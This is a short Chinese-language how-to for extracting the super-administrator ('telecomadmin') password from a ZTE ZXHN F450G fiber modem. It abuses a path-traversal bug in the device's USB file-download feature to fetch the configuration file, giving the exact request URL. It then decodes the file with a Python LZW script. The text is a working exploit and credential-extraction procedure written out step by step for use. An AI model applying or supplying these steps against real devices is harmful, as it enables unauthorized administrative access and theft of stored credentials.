获得电信中兴光猫F450G的超级管理员密码

光猫型号

中兴通讯ZXHN F450G。

破解

原理

F450G这款光猫附带了一个功能，就是远程文件，类似NAS功能。把存储设备插到USB口上，就可以下载里面的文件了。但是这个功能有个BUG，就是可以下载任意路径的文件。这就给了我们机会下载光猫的配置文件了。

获得配置文件

我们需要先插上一个U盘，然后下载光猫的文件： http://192.168.1.1/downloadFile?file=/var/config/psi

解密psi文件

1.删除psi文件的前60位

需要删除psi文件的前60位，才可以解密

2.解密代码

pip install lzw==0.2.11

import lzw

filepath = "your_psi_file_deleted_previous_60"
infile = lzw.readbytes(filepath, 1024)
uncompressed = lzw.decompress(infile)
with open('your_save_file', 'wb') as f:
    for bt in uncompressed:
        f.write(bt)

使用telecomadmin登录

在解密文件里面找到telecomadmin的密码。